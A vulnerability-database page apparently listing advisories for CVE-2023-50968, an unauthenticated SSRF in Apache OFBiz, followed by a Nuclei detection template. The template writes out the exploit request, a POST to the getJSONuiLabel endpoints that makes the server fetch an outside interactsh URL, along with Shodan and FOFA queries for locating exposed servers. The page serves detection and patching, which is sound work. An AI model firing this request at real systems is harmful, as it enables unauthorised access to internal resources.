| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| The vulnerability of the Apache OFBiz resource planning software lies in its insufficient validation of incoming requests, allowing a hacker to execute an SSRF attack. | 2 Jan 202400:00 | – | bdu_fstec | |
| CVE-2023-50968 | 26 Dec 202313:26 | – | circl | |
| Apache OFBiz 代码问题漏洞 | 26 Dec 202300:00 | – | cnnvd | |
| Apache OFBiz Server-Side Request Forgery Vulnerability | 28 Dec 202300:00 | – | cnvd | |
| CVE-2023-50968 | 26 Dec 202311:45 | – | cve | |
| CVE-2023-50968 Apache OFBiz: Arbitrary file properties reading and SSRF attack | 26 Dec 202311:45 | – | cvelist | |
| K000149612: Apache OFBiz vulnerability CVE-2023-50968 | 4 Feb 202506:54 | – | f5 | |
| CVE-2023-50968 | 26 Dec 202312:15 | – | nvd | |
| CVE-2023-50968 | 26 Dec 202312:15 | – | osv | |
| Design/Logic Flaw | 26 Dec 202312:15 | – | prion |
id: CVE-2023-50968
info:
name: Apache OFBiz < 18.12.11 - Server Side Request Forgery
author: your3cho
severity: high
description: |
Arbitrary file properties reading vulnerability in Apache Software Foundation Apache OFBiz when user operates an uri call without authorizations. The same uri can be operated to realize a SSRF attack also without authorizations. Users are recommended to upgrade to version 18.12.11, which fixes this issue.
impact: |
Unauthenticated attackers can read arbitrary file properties and perform SSRF attacks, potentially accessing sensitive internal resources or configuration files.
remediation: |
Upgrade Apache OFBiz to version 18.12.11 or later.
reference:
- https://lists.apache.org/thread/x5now4bk3llwf3k58kl96qvtjyxwp43q
- http://www.openwall.com/lists/oss-security/2023/12/26/2
- https://nvd.nist.gov/vuln/detail/CVE-2023-50968
- https://issues.apache.org/jira/browse/OFBIZ-12875
- https://ofbiz.apache.org/download.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-50968
cwe-id: CWE-918,CWE-200
epss-score: 0.63373
epss-percentile: 0.99109
cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 4
vendor: apache
product: ofbiz
shodan-query:
- html:"OFBiz"
- http.html:"ofbiz"
- ofbiz.visitor=
fofa-query:
- app="Apache_OFBiz"
- body="ofbiz"
- app="apache_ofbiz"
tags: cve,cve2023,apache,ofbiz,ssrf,vkev,vuln
variables:
str: "{{rand_base(6)}}"
http:
- raw:
- |
POST /partymgr/control/{{path}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{{parameter}}={"http://{{interactsh-url}}/api":"{{str}}"}
payloads:
path:
- getJSONuiLabel
- getJSONuiLabelArray
parameter:
- requiredLabel
- requiredLabels
attack: clusterbomb
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: header
words:
- 'OFBiz.Visitor='
# digest: 4a0a004730450220280abfce1ed9dc11850dc5eb38d90f3e82d209eb748494f0f60c12153dc49abc022100af218579ca1f3b42ce343f1868856f2c0f4b02cbbc77670800f95a4d0a2eaf5b:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation